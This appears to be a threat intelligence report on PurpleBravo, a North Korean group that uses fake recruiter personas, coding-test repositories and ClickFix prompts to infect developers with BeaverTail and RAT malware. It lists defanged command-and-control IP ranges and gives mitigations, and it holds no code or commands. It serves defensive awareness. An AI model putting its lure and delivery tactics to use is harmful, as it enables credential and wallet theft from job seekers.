Full Report
Discover how PurpleBravo, a North Korean threat group, exploits fake job offers to target software supply chains, using RATs and infostealers like BeaverTail.
Analysis Summary
# Threat Actor: PurpleBravo (Associated with "Contagious Interview" campaign)
## Attribution & Identity
* **Attribution:** North Korean state-sponsored threat group.
* **Known Aliases/Associations:** Overlaps significantly with the "Contagious Interview" campaign. Associated names include CL-STA-0240, Famous Chollima, and Tenacious Pungsan. Shows meaningful intersections with PurpleDelta (North Korean IT workers).
## Activity Summary
PurpleBravo targets software developers, specifically within the software development and cryptocurrency verticals, through sophisticated social engineering schemes involving fake job offers. The group uses fraudulent LinkedIn personas and fictitious lure brands to distribute malware via interview coding tests and "ClickFix" prompts. A critical aspect of their operations is targeting job seekers who may use corporate devices, thereby acting as an overlooked vector for compromising the IT software supply chain. Activity tracked from August 2024 to September 2025 revealed thousands of potential target IP addresses.
## Tactics, Techniques & Procedures
- **Social Engineering:** Exploiting job seekers using fictitious recruiter outreach, fake job offers, and fictitious organizations/websites.
- **Malware Delivery:** Distributing malware via malicious GitHub repositories, interview coding tests, and ClickFix prompts.
- **Initial Access/Execution:** Candidates executing malicious code on corporate devices.
- **Collection:** Stealing browser credentials and cryptocurrency wallet information.
- **Command and Control:** Administering C2 servers via Astrill VPN and from IP ranges in China.
## Targeting
* **Sectors:** Software Development, Cryptocurrency, AI, Financial Services, IT Services, Marketing.
* **Geography (Victim Concentration):** South Asia and North America (based on target IP concentration). Broader targeting observed in Europe, South Asia, the Middle East, and Central America.
* **Victims:** Software developers, IT services/staff-augmentation industries (due to high potential for downstream customer compromise). Twenty potential victim organizations tracked.
## Tools & Infrastructure
* **Malware Families Used:**
* **BeaverTail:** JavaScript infostealer and loader.
* **PyLangGhost:** Multi-platform Remote Access Trojan (RAT), optimized for credential theft.
* **GolangGhost:** Multi-platform RAT, optimized for cryptocurrency wallet information theft.
* **InvisibleFerret** (mentioned in general findings).
* **Infrastructure (C2, etc.):**
* C2 servers hosted across seventeen distinct providers.
* Observed C2 administration via Astrill VPN.
* C2 server IP ranges concentrated in China (e.g., 36[.]35[.]56[.]0/24, 106[.]41[.]253[.]0/24, 223[.]104[.]143[.]0/24).
* Observed C2 admin traffic utilizing IP addresses in Russia that intersect with activity linked to North Korean IT workers (PurpleDelta).
## Implications
PurpleBravo presents an **acute software supply-chain risk**. By targeting IT service providers and staff-augmentation companies, compromises can easily propagate downstream to their numerous clients. The employment of deceptive, professional-looking personas makes detection difficult for individual job seekers.
## Mitigations
- Rigorous security vetting for external-facing communications and recruitment processes, especially those involving coding challenges or tests.
- Strict policies preventing employees from using corporate devices for unvetted external tasks (like coding interviews or running third-party scripts).
- Enhanced network monitoring for traffic associated with known BeaverTail/RAT command-and-control characteristics, particularly outbound connections originating from developer workstations.
- Awareness training regarding social engineering tactics used by state-sponsored actors impersonating recruiters in the tech sector.